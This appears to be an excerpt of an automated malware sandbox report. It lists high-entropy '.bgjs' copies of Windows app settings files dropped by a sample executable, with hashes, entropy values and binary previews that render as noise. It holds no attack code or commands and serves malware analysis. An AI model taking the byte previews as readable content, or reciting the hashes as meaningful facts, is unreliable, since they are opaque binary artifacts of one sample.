                                                                                                                                      Preview:regf......,.....B..O.L......B...>$.......r<..w.A.r.?..F.<..>..;..7].U1.0Wl$*......H.....WX..t$...:.........:.z...Y./y0Z.R.....1.V...`2.>........v...7.q...v=..V..r.....Y7^.%.....3&1bw...!H.f*...p.}....X24T.<y.?..*..s.u..mZP...l_...sn..&.@+.E4mJ..O.....N..j$.s.p....M-(.....!..oe....D..v..6...6N.....p..#.9!.00.1.....%R.\....^#....bQ{...a*o.p..0..9...;.Q..3r.dL..qtY).i.._\I......^..T....U.KQ.d.M...8.6.B.\.u...w..K.....*I..;..h).h9..wd..?66#.%....3.O.I.....j".W.._h.X7Lu....1s......'...M. .m.u..\......[dt.....!.T.r~F.UD./..G*;..c......g.`.....4...v8..J....1.....3....gQ.H4..q9.d......z..=.EH.<|{.......J^.......n]dXp..j.......W.9I5&...4..T.Q...6..`......X7..R.G. ...,...#...u...1..,..@V... C....".4..vb.N_O....pX...|...T05...../.S..Yn....k.x.B."9.g...A....G...e".......k.N.M....}.?...x.bU..S3..R.B:..H.....T#..../<.......]...^...L..X7I..)J...S.l..,.....B .i*:.4..-.a5^.n...NO..X=...2.#?..K3.Z....BL.A5...9lH.....u.S&..X.$...I......x...k.....R.O.....z..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976590330670892
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:85pHc++6UgKUjPH/GAUv5qkv6MJAiKtwF/VgzZI2U:qHUQziv5qOAiKu/ydE
                                                                                                                                      MD5:E92156B0ED9FC0039ABA48D57E7BB239
                                                                                                                                      SHA1:57AA65116E96D47900B6DE0168DC8078BEAAF5B5
                                                                                                                                      SHA-256:6F7108B068D69317FD0CC904FF90A5EDA70D104EA67B6139B4D56893F336E237
                                                                                                                                      SHA-512:BBB057CAF8C0BE25DC080D1C0FDF71D522303056B4D761F8A72978E45C997EC7896F87BDC255570BC1A66518B1CD10E8F8F3939F1BC849CAE9A20947F73DDE3E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf../.>g..:..T..Yf6.l...9......._Ms..m.@....U.!_.[.{k..m...M.5oO.....E`..-b.y....>..{..Q....]_..@[g...(wD.*..K.. .../.`...V.4.....1...jy....._'_g.$..E......R.U.................M.&.<#.R._~4~S.?.=.bCS.P?.......u...T{s.D(o..)*5X!..$.k......Aaf...8.....3h.....l.P....NCc..O.Z..5...e.q.V..r4.sW.../..t.u.w..Iq9W:.4.O...y....z v.b.....ae.........u..p.^.....*\......70gzf/..[.>.w..@..l.BgK.|....l...G'.`...K..B.....O..Bn.&.K...b....4.X...9+M_.>~.8....4...y.q.EI...+..D..y.!w<....3L.,t~3o....s.)..n.......4.Pl......<_;Z9A"....)..o`6\J..X..s(.!..^..%.</\fC..xVT...J...).+....^.O.+.I.@...w.d,.....>K]..V....6...........z.......2S...........,..................-.v7f..N......I.......:..H*.]......A..&g.Dwe./&..!..P....C|..Z.wb=:.m.S...Q.w..BS..Aj...L=.....s..X.g......B$...X7.A+*........?.7A../. ..v....NT+[...{m.I....B.xm..f..r.j/}....A.....]..G....y..4.%...q.......0".....f.AUp?K..oe...'..i..o.B.v..@g:.f..S...DC.......j?...Im.R.T.......-.9y=..{*

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979280231224567
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:2DTe3ClJ2OgZeb7Xdb/idztpQl9pnabiFAabMo:2DC3ClMJuLdQBpQl9pnabAmo
                                                                                                                                      MD5:279E39F974F405E76CB0EF84269C60F5
                                                                                                                                      SHA1:7E4D55C50B4C0D1EC136E0C65FC303FE9A7913D3
                                                                                                                                      SHA-256:4E53E657112874E13A4032D39EEBC6064B250E513767C2FE24BD051B18F2DF0A
                                                                                                                                      SHA-512:0916B2F487553440873A4C378FA22BD09DEFE5B97671B8EAA1446749CAD7B4F4005A5A1B0853ECA34DA63EBEFDA3F94C85A9B70DC427EF19E93432BD7CE10EB6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.N..".r.=J_...d..Jq.!S.f..B.....6.c..$....G*.XW.`c.;uQ..."!X...N.j]...;.f.u.fwqF"....t..W4"..X4.....~ZNt.G.MW./e.{.......e.F.J..T[;&.7tP....}.....m.......f...'.......#..B=.6.`...vq.C.;.....E....M..&.....V.N.OMU#I]./3.....*...)a.p8........!W;..A 1.....Z.%.,.>\....g.t9q!~..aU/... h.C..zO*.@gI..N.4.9.~.!.".Jg.r...7*..,W.H.......f,...{..A<.E...G.@..t]lM.?....R... .h...}G.G.I&...B..v.5...?.r.~)O.f..!...G.V..1{........Y.7...~....pvj...Lo.1./.3..a2.......]~.>?`.$_.#F...Kv8..Kv.F.I{1.K..I.E.$.....w.%\iU.Q...].....I....A.c.SpZ.;<......N&...O.Ik.A..3p.Z......2j...C];.Q@.......%.Yc....qKEQs...-.w.G.I...i....R..*...'..f}Px.....<.?Y@.9Y..(..@m$..B1Knd..:.m..a.......4...B.8.^..P^G....Z.)G....4..BX.....]..eF.q..u...D?.e<.W;..*y..A.....l.d..%.)Y3._...l...y.R.........!..;f.W...2j...0..*.... '....r...d..o......%^7..H..2...{we`.{.*.....~ it..0i.D7...*\...ST...Z.T|w..;.<'...R.yl.$.3.R..'am,.$<......D.....Y.|4/..K.8.o.UWM..3Zl......I..q.......*

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980462781581752
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:bSTuCaMwfFsbwNs5zbG2NGyGEcm26aTenNwPCIu:l7MwfFnNsZG9EcmpBnWP2
                                                                                                                                      MD5:6CDDF254F6B62D7F77D6063EAF199631
                                                                                                                                      SHA1:559FB0EB1DF6C140758BD482A466AEB2EBFF9A25
                                                                                                                                      SHA-256:8EDA7F876EC43CBAEDE78D545D864E07D3D4A677501FABEE1378C9DD9A7ED9E9
                                                                                                                                      SHA-512:0AD1D8E6A199166CE483426579E0C5BCD9D6F96514DF7BBB47331099CDF6EC5267E319C289BDAB6314F9EE0E0D7191E68414A617519508CCC1E24B392EFE1D72
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.t.O.K,....H6g..:_....".... .:..%...e..,....h.N..=...."....?.a+..[i.vM|J._..q.7.[................e.s..J...F{.W*..wo.l.>\...4G'D."....8RR.UT.....I.u.G.Md..3,._...t....X"..X.57.T..9...a..3..bh.i2E.9.@..X<..-.....r..>v.4."q.nt.y".?..y....Wk-...X........8..d$ff..........?..u}.7.....5........5h...NH4...f.....~h.L.<.4......U;..d3c.....K.......F0z.,..h..G.......ssm.w.l.d.`g.$F@{.4..y2....|-..y...P.K..=..&.d....nhn?.5..#......xx....1..D....C..X...9.0.X3..).:..G.!...j....?n?.0.5.m..j@|'..M(9.O....Jl..?JkG....SJ..N.E.MI..B..hm~b.P'.......T.&...a../....]..8r.t.Vt.i?.p.Xz.D..a.............&.....7.Hlf+s....A ..S._$...+.c..*.T.@p.c....^...q.....r...?.....$...........B:...aE.....a.j.DJ[V.z.h...@...n84.....*.K..=..XZX...5..VCF..f..!.}.y#.W....D....o......wK...8>..c.? ......hQ...N..ut.2.H.6....j..=.-[.........p.Ep3'.(.(..Y.(/...+...Gqo....^d.I,.;'z[qdq.._M.Y.~J.NP..b5.m5...Ur5i.Xj.Z...W..[{Z..{.%...E.5..1..SI.....uX.P.;_.k....pmr..`.!.....>..#.9...95!uy.E

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.MixedReality.Portal_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976461423171151
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:33llOQLthKHi4IaiFJWHrjSjyHAIul8/d1iFcxan3OUQeh/:pLthK9IxI9gpgdLxENQeh/
                                                                                                                                      MD5:B620DC43B49882D88F61ABA21075E198
                                                                                                                                      SHA1:5B30C285BBD7409FF9C2EE80491EC9C74DB64EEF
                                                                                                                                      SHA-256:9BE21E454E69C50C08D9D86CB75B805A081B4B515E9AC5A437D0AE3F16253144
                                                                                                                                      SHA-512:039653885C4F1D165911A560E0A1D85C28A44FC7022A0CB33A4B74B10F5DF03ADEA5C6EFF60EDF7E8229A21D4ED8E09DA25609DBEE4CD8F6CA257F0FCEA47590
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.CO.......9h..)..RM..T.z.yT.......6...\h7......t...y%.J..F=.~....;R.ZY..=.<,6N..ta.w.p.i.........e.N..~7.....f.c..."\s}.q=xep..k..#..(.......0.._.V4.S9.........Kv....A........4:..&}4............3..........u.+:z..i.1.B..H(.....1|...,-..6.r.+....^J*..\`..4B.....4..t.^\ho@....y..}..|*@.0.J..L.......e..5...>..Z.L.#p-+......k..j...p...b ......2.K[B....1).-j.#@.H.B..%;.C..}.^...m.u;]j.w...mbd...8...P.Mt..)[...T..,..;O.m..D\..o. q...o..%g&.J().!..3P..D...9t ..i..O...E.\..v....5.p.",...._..;.dq........fsj3..l".i.3.,..4..p0#..5.....5W.Q|.)4..{.....l..U...*...Q........J../...tF..9._..mh..a"..~a....$..%.lK.g>..B...5.K.0..@u.r.:..Pt.....h..~....`zj...t3..C/3j.>...iq/5D..'S..;u7.x.....WL.r.....J.(0)j.....l..).*0.2!.C.,.Z.....`...A.....ki.C.p...*..b....1,f....2.."0.C..Q.....D.u.z.N..-......[.u.....Z.,..oU:...s=;RH..tq...yY...i..nG...o....C..Aa.`.K<.......z......]........?z....O...j.x9.8%......Z.6.k(..w!...x....2Q..^../a..) ..`.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978586010931804
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:MAlOB2CnsMVsOmKhTwbJxGFiToUH4iEZ9fUmgchYsG:MAlOB2Cns/KqFxGlVfUmnyP
                                                                                                                                      MD5:7CC4A10A86FCBFA4C35A174B58F1BE52
                                                                                                                                      SHA1:5990371279530FB8823EB9AACDB027F42CABE3BF
                                                                                                                                      SHA-256:25F6E5A20C19BA118C433E1991410F5A81423BCC187AEF52816529AC07447E71
                                                                                                                                      SHA-512:441E84332EC3E33186723060AAC6D247FE45844ADFB896ECC05A5D5206C733D397F6FFF53B417F3FF2FCA96E35E437E854A70F99A0E16A3B29EED72D9D078CB2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....=....BQ....6...%2G..~F...o=.e.^~Y"..yf.J...Rv............9......I...^.O.4n..h.8M....I...RR7..e#P...Bl.!..?.u.i..g.,S.AHGv."uo$...~....#N [..h..X.....w.|....e.w.g.?..M....vz.....=.....n.\..N...Z...6...D.."l-...P..N...F......s..p..eD.yS.$A..L....a...H^...<.....?o.../q.0.:5?..^DS.|......}3."..c...QG..e}..l...;).&.j..*w..!%O'>J...U/5=9P...HpU.D.....|.....5y:..9E`7XVQ.[.UV&\-,.. ...)...\....W..<..ME.....#R.W.%U...z...xw..7.I..7......_..).j..GF....h.lA..[..rh..C...7.f.h^..|.........R..._.....!.O.&;..qn..........x."..$..k.......\.2....)<...=.=..<.=*.,x`...?.........T.K.=..@L.9.......^.v.f.....U..M.*:..c."....t....bJ.....K.r.......E....y..:&...\.p..........^.....q..XI......0v..!.g...B...(.H..4v$.R.L..MP.J........1i.i.t4.9.&...A-..4..a..-...gC....1Cx.RD:>g...P.|.;r.P......0C....~{.....D?n.l...?Oz;...q0..%.Mxt..D.....W.GS*...f.}..P-U.,3.....-...4.`.:B3hLiUr....mM.........Z..]...B.W..e..}.)]|.i-r.yob8.8+..y..)....v.g.Y..).T..h..2..#T..h...{.

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977765403151982
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:2aV3Jo1xlGQCHtT3QC0YR55I6ug7aYCAUmea:2aVMG3tTlVEg2C
                                                                                                                                      MD5:064A26C2D1DC3C29DADBB107DFBF2AAA
                                                                                                                                      SHA1:A3CE9AD9C28FF01E52B772E200B46E7F4028430D
                                                                                                                                      SHA-256:06F8940D51B3DC89911A2100AE2626EC87AB64DF78920BFF5CB2F96503647AB8
                                                                                                                                      SHA-512:9971BDF67368819097522AD1099DF68CC7C5ECC53541899A7304A3782F874748168763A886FC9DABF087ABA1093EDFD6A11F2E17CF5B2E5916D0867E39C2A7D4
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.......A .!.c.+....{q8.....J.L.............!.u..ts.,.M.q..I.........q.}......l.vs....'..>.KX...j.R.=eNT\^.8..Q...el8mQ...L..:.TB..U..U..{+../._t.44...!..G..GS..8..?L..%..4p`.....m.H....2.......&~t.............=..O...3...x...K..{C.t...2.X..G....;:Y]k.B..k.Tl.v...).|......S..+..$..2..g.o..T...t.....OmH.n.J!/.....Sok.U..I.W.x..6.>0...fN..#Y...o...%.%...A@h./....0...e.{.{OQ.....W..a5&4#.....Np..@ Y....Up..l.x.....E..2...Pe.]...0.3\...j.&,.L.F.b.&3.-...l6.{..[.vq.i..&K.....4l..O)x.....x.....d.V.I.....5..._.*&.....|......%..:H..G..g..D.F`..w.jM.c...'.%w.m+..<].1L.-..[.....d...~~....w.....<.n....{|irk.@.F]..*.$e.9=.y...[..i.....v.%t....iF|3/.......D:..c.q\ z.......F.5......G.c"G...yB8....G..e.S..a.!.......+.?(..`.{..CU./.j......l.4-v.R%..u9....8=.".....i......,.......C.Q..Bv.Lv Fw..1.........nVaG.......X.^#g...1..%..V.fW..[%v].gR..WG.C7..C..v...]...@y...N....s.W%.0c.._s..C.)......`;.......[.[..S4...T..YdmVZ...[....".......Y...S....4.n

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.ScreenSketch_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976151594457017
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:3f+cCodS9ZxYomAtI200HGOVK8ZBtz18OAg53HHMDLEgI80:3WcCow37mQ0JOogzlVHHPgK
                                                                                                                                      MD5:555ABED84F96B3AAF64DE90A463CFE0B
                                                                                                                                      SHA1:7A44065BDB49F6B84D56CF86E830345EE42DFC35
                                                                                                                                      SHA-256:3C9ADC42392DAA53B9585D40667145FB6775BCFDF76DDA3244264F1E9E0F6CDF
                                                                                                                                      SHA-512:158F7A5EB551F153050227EE1BF4E96DF7B7D4EE143735DBA4B260EA9403F2E3084F74D6BC09310A90644BE50874B756087D403EB76D2B6C48227521817E37AA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....X..a.J.%|P...r{.Hw.i...7...U.^3.......M.b.\I:z..HI.C...o..Vs"#.o.i-..Y.*.^.e......^...A.|9..$........l.Bl.%..^.W...6q`...f8`>...E./..=..Y.....U}".B.&X.)BZ...1.....x..^T.P..p.Whpt.8..;a....*d.x4@V<.......Cs.P>,...)f....kt.B^.0`...._b....:...pj|.*.....>..5~.......vc..a-n..\.....'......'.-.>..,7...U..M..(...ov.....L>.......{.-q.'....W..Dm..jn..&..R@..q./F;....x...Y..........X8.......H]~..(..P..4s.>...g.T2...>7.......j......e..J.]~...V..S....q.].9.d..u4.<.Y..)hah.H..i...^//3+..8F....m.d..j@.a.....M..|..@.4}d....s9;..$G..(`.U..9KI.........X...>..l.,.h.J..!.....'C.T.&.u..F."n.<..XC....g.i.....:......z...J.F..p..jT..........s...t.x\.!..y...=.d..*PD.....}.$<n.W..m.D...{E..J...s...XV....NN.k.EL.H..06..v......_.r<.mA.V.2D]................K.D{./j...'KLG(J...cj.g.+..x.:hU#.1{.9.CN..F.D;2k0Z.+l45p.h...Y..!....,|...M!.pqx#.[0J...W....9.. \.!.......m.{.....X.;X.3m ..r...B!.s....1..|12<.+!..kR....;../...0.\..~..@DmhbVYH..X...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.SkypeApp_kzf8qxf38zg5c\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979361955937029
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:RsLNwgAzpfFFEixJDL8V6hiP8IkpjM+hKVjLLt+TyH6ym/CbA:RsJwgANnEi1hi03KxLMOH6h68
                                                                                                                                      MD5:D564E6931D6C59487E56DBE1AF5699A9
                                                                                                                                      SHA1:6EC6DEB05547251845FE142955959E29B8CAC76B
                                                                                                                                      SHA-256:EDFD37F4CC054D49BCC4C2149B3F10E6E1CB283C68E9F300B64F839A55D64116
                                                                                                                                      SHA-512:6A72821F5EBA9774456DFE82D931F3BB9E3E1D277BF9F3B3577AC59B5EBE4725CA6436EB7CEA83A14A85D6A10B529A18E0A2DE21BFD4AE4A2A3B38BD58B8EEE6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..........B.8..6K...n.........9.'.+^.;/:...xE.Z|.LF..8.f.....v.()...2..:.o...dgew...[.X..jY."5.3....r.xm .h.|pU....W.......`9..r...7......sQ...>...m2u..zL.....w..RR.@.`..!....vC.'LI..q..6'6.f.I.......S..K......m7vE|T:T..T=,Fvl~..{..(.*......~.A..$.h.SR.......J2:..'.v.DCP...p.)RZ...;....`...L..<{$=?0.j*...7.b.J.~....J1..x.N.F..V..~...l&Gx.YL.wM.....7..o...x....q..gj1 ..|.....F.......3@7...}..v ,.....R....._(.......m8.i..9..._....I...in......u|...g......G.l..|..9....Lm...S..5....j.O...0?8..9n....f.".zqH.@............4_#{./.........%&..wi.k.}.;..t.I.w3.X.T.X).6..&.SI=7...[S...0..Q.P...g(`...&.8q).8.$..g..R.7.\...q.....|.6ve..O...g7'.}.5..X.L.fj.j..@pci...h......W...^.T.y.O..t.d.8.......OOC.....R...0.g9..2...>....4.mN.fAb..lf..m..(...W..R|....x.,R:5h.7+}........x..}.p....x.[f.c.."Y.A..7...z.1..j......N..j.... f9C..f.4G...-.9Os.\.n..7...y.D^.t..lKP".8.|.....I.V.G...{....B../.t=.}...$w.F#\..7.D.q..........8}.XIo.U..,..WE...%xC........%.$..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.974838963365924
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:9xfVpgQql0qw5JkyyKdUJ8hkHirTfQwSDB6U9NSUO7IdfEZCRUJP:jfVpFq7w5Jkyy60mlSDBzwR7sfEQM
                                                                                                                                      MD5:5629A208D82D0618ECAC383FC93D242D
                                                                                                                                      SHA1:AEC0CF2F67A204F6705FC079C5BD586D3CB2781A
                                                                                                                                      SHA-256:EF6FB1B02F96ABA8A32DB41C803BEAB7F59CD71C0933DE95C8B55D6A04324BB4
                                                                                                                                      SHA-512:0A9919A621DB12354820820B31D3BCC3AF61E417ACF830C5C69F00EEC74AC27B783E3A82EC058024ADE6344898D09A0D4CDEB597E2737A509721642A4419AE5D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...c...8"..b<.E3?.........)lKY.=..z.k...0..U.s...*....N...y..R..A.f...~..H...m........0r..T7.....jr.N..=.......:..4w.(.M.DN..M.."JU|?.QJ.F....l.....J..y....2@W.".W..?d.3.7#.Rsz...C7R.....f..7.0.....9...kU..%n..?.. .. ...U.G...d.B...~...^D...`.V.....E.N.S..y.Ik4..;h<=.....^V...P.$[85. L)[n.<.U..:.g0'.L..?..:..8;..08....*..;..G..'H....j^{v..a.{3~N.O.'J2.j...!uF;,.rK.).)....t........"3.i..J...9.(.H.U..'.V[.oR...F..a.T.+..mW..g9z_."....s.....4......MQ..m.+.A..-..(....'..E.{....q..{.I..~.k.d|.......<....$..>.....b.1;.....Gl.......we.ll......B.).?7^t...z..._.vh........i...H.2/O.}...)..P..LZ.Q.......!.....)....T..!.d\...o....bA-..N0......W.-....M..[.........N.m./..4...H['..,.x|....l..\f.S..R....... ..{.!)e.@:.i..]...W.....leD.v....*..N...P6..B...w.0.&X.X.}.....lg3....x:.[&....c..V.y.....D]X.j.# ..U.s.5\.[k.k|)..b#Ur...j..3.k..R.|.O.......t.<b,... g._..7.........r.Y..>.aX&[.>.e`.R...C.y3r.K.-*'.......G.Q. .O...x...b$.D.%.........Z..C..

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.VP9VideoExtensions_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978968441836402
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Dsuz0kSqOp5DMwQ6x/fkSDV16DpoGUX2AS9Ca9CcVRDZZS:guz0TV/NQ6NfkUV1kUXFS4a9Co9C
                                                                                                                                      MD5:95F2E898B35929EFC6307B63502B9F75
                                                                                                                                      SHA1:74BC2100B8DF7C06F561B570C9F5CBE7D163F3EE
                                                                                                                                      SHA-256:1DEE950DF71D9C421946799AB2FDFE89626B20CD661FC46BBE2750B01E0C711A
                                                                                                                                      SHA-512:8833D9EE2A2C2C913FE35CF0EEBC641A5AF82D1CF02CB8A31F82438EDB28D28B81F4F30936C2D9652925D07057A29721B3097D0A2954E9A9399B01AE4AE87D74
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.u\..S........V..`).w.t./c}i.gH...pe..d...ez..R.[)PK$.}....a.?..B...>......t.*...^gf.I7...IIpD........7.''fA....c.g..7.....n....I=......&.6..G.-[..R?......<-.lTk>....q...;.....`......k.L......c...".9..".l....l....H+l1....i.4.....^5.....0..s..s...t..J.a.<..Z..sC..R..........O.....CJ...0j.....m.#.Y.B...@R...)(tp..0..Na.y}...N.&.......bP..i......W..M.l*...Y<It7p..R...B.*q.K.....V$..c..q.[v.....K<...$.O......).&.\.RAB(!&$..1...,..X:.c...!..<b.=!h.......|.Y.....l.D..Gm.<...:...V..{..c.ux....G..._Zl...f...b......\L..6..../S...&......\.'....w...rI".$e..L<..h=Ha..6T..,g7....&....KBr[DM@...@.=........Gx..>j<a.....].JG.....Q!....V.F...jS.X.....n..BY..C...$..[.;2...xn.R...x~..G,....-.7.y8.....=U.2.......[.H...j.K..y.Q.].`...b....4..}..4.....N?......u_M...3....z1.fn>..An../W.4|.D>....a...Q=.>b4..y....[.l..........'_.:.. .V...[0.F8...o.QB#I.d.T....p/$......B.t............aW........0.#bd.>..*.V..,.,.....&..}p`y.x/c.2B..8.3v+.Z.L..1..B. '..\..^m{A7...

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979863605845537
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:GfNW9nZaitCtRDYSBBToKbWORRR08IBARrLW2:GfA9nZ1CtGgo+FRy8ImXh
                                                                                                                                      MD5:622EA078BBB62ED3851EB05388C62306
                                                                                                                                      SHA1:9B24F5B1132F3705FE21D728EDFA7B136E49675B
                                                                                                                                      SHA-256:0CC036B2BB5AB0897D4A769A3614E9F2DDC393EF6EE29C8F0FC57E3A80F801F9
                                                                                                                                      SHA-512:C7B674EFF6365E1BD241B4B6297B6033AE46FF113F3CCFD3B4AEC2F312C23E55B6F0C52CA0C3EACDDCD36A02AE52A92BD4A574DBACEFC77E2655F878A53602F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.39.....3......A...h..e.i..h.d.f...I..O....7..2...*'8un.b.m!EI+.CK..sOD6...7....m.z$..g....\....b..0.....-.......n....?.(M........XM....i.p..u-.8..D.=..}...........s..W...!.,Y..om..B..93}..>..YD.."O.RQ..YM.[q.@...Dh...Y..&............%2....\.......8...!,...s.#o.uWS.....Q._...(..a[..'...........u...%d"M..........!...y.D.....0....d.&....*.H.#.li..'.#.&...`..n....)64.@....2.w.i.li'k6..o.2$m..;!......[?V..r...z.7.r.....1..}i...}]T[..@...B..k..y2y..T..k...3?.J..!J...7....%..Ka...w..oA...w..*<E9....<....4..>....~.G<...UK.m.?...r.6.eJI...r.n.D..p.......Q!..u1.O..o[.......%.?vv.(--....0=...e...;...fX....{..L...3.m..z....c..6M...]..c..........<^......{.>.3.Dc2.7..).....JH...a.6.F.....r.=.u..I&..l.%x...,..|...#)3......[.......D#.6.!..beG..:\x.o.n.'..)=.YOd.5....4l..uj....M&.....b.6j.".......q<{.R<.x..:....?Q.........c.."&vn.)..Oc..A......Ch..G*.I....]4.S\Ud...j.X{lTL.....G.!..b......`.^u.yg..l>j..3...V..z(...+...Zr...z.d.(hd....R

                                                                                                                                      C:\Users\user\Local Settings\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.9777675169832465
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:1XdIbnhr8TRD3r61lLWdaRo2gpx+IBTHE2FFqRKAn0y+fn:KeTRD2f8aRo2MbhFFqRvnI
                                                                                                                                      MD5:5D02A45E2FF09B71F16EBFB7077C34E1
                                                                                                                                      SHA1:E8CA24BE65889A90A4F7B689C5E6515CD6D71414
                                                                                                                                      SHA-256:3B8FBC7DC34B11CA8DB02E2107A0CF75606A2C6A047810357E2DBC1B047CE8CF
                                                                                                                                      SHA-512:00B8CFD8151FB25AB1BABB340583A6B0D1CC341EC0948C91B135FF5B2D28A879B064E74583715D33C5A0904626123D2F5F6F646EA0F68A2F9051EC5623BAE16E
                                                                                                                                      Malicious:false
